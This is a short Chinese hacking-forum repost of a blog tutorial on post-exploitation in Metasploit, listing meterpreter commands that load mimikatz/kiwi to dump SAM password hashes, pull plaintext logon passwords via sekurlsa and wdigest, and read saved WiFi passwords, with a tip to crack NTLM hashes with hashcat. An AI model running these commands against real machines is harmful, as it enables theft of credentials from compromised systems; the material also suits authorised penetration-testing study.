游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

渗透测试之提权篇

发布于2022年11月4日3年前

利用msf获得系统shell后，就完了？ no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？
msf渗透测试

获取明文密码

如下，我们在msf中获得shell后，载入mimikatz模块load mimikatz

这里提示，需要载入kiwi我们再次载入
load kiwi
获取系统hash值

mimikatz_command -f samdump::hashes

f0bb20c58c25dca7288b4fa087bb6ee8-blogsy
参数说明：
user:用户名
NTLM:hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）
获取密码明文

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

fcb861e30263a8dae8e13c1015581d21-blogsy

获取目标WiFi密码

wifi_list_shared

wifipass

获取扫雷的位置

mimikatz_command -f winmine::infos

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1971.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

注册帐户

立刻登录

https://www.hackhat.org/Hacker-topic/4514.html/

粉丝

转到主题列表

没有会员查看此页面。

登录